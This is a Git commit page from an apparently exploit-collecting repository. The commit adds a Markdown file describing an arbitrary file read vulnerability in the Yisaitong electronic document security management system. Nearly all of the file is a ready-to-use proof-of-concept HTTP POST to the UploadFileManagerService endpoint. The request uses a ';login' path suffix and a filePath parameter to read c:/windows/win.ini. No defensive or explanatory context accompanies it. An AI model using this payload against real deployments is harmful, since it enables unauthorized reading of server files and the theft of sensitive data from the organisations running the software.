admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞.md

Browse Source
This commit is contained in:
wy876 2024-05-14 18:58:35 +08:00 committed by GitHub
parent 1f9f6fc73a
commit 52d6d03ca9
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 10 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,10 @@
## 亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞
## poc
```
POST /CDGServer3/document/UploadFileManagerService;login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
command=ViewUploadFile&filePath=c:/windows/win.ini&fileName1=111111
```